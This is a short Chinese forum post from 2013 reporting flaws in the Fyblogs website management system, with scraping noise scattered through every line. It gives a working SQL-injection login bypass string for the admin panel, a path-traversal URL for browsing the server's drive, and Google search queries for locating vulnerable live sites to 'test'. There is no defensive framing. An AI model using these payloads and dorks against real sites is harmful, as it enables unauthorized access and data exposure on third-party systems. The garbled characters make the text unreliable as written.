漏洞类型: 未授权访问/权限绕过7 d7 Y% @; i: h m9 F
5 E$ w8 T( |0 a! E8 V简要描述:2 N+ {2 C3 o5 H9 G+ z. _- ~/ u
- C; U: }* e. n- V" G
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
# l1 w$ ^- }, S" L: R4 p
% r& w+ W6 F3 N+ ?# O P! \& U详细说明:
2 Z3 r D" X2 L* Q6 d$ \& ~9 C- t/ e* `) F. p- @4 ]% ]! w
后台万能密码 'or'='or'
& S% x) N: U) L5 m后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
0 X$ i( o' ?# H, f$ z, L/ aadmin/uploadfile.asp?currentFolder=/upfiles/../
8 B# F0 w2 @- s; G# d3 `7 m3 l7 S6 \4 T& n- t$ e
漏洞证明:9 g P. l2 f/ o7 l/ L% b8 @* f
4 M' R. l( G0 E, \% w
谷歌:inurl:type.asp?id=1 新闻中心! r) ~8 R8 W2 U! A/ o3 T
或者 :inurl:download_ok.asp?7 H: M6 O; d2 A4 b0 Z9 R- {$ K
& Q: Z; s# |7 W9 k# J9 a
可以测试
4 C3 T7 |4 I! D( K2 q6 |9 ^
( {4 l, r4 e& m1 f7 \4 |+ m
+ N; N+ P7 D, j5 U7 c$ M |
发表于 2013-3-7 13:07:46
收藏
支持
反对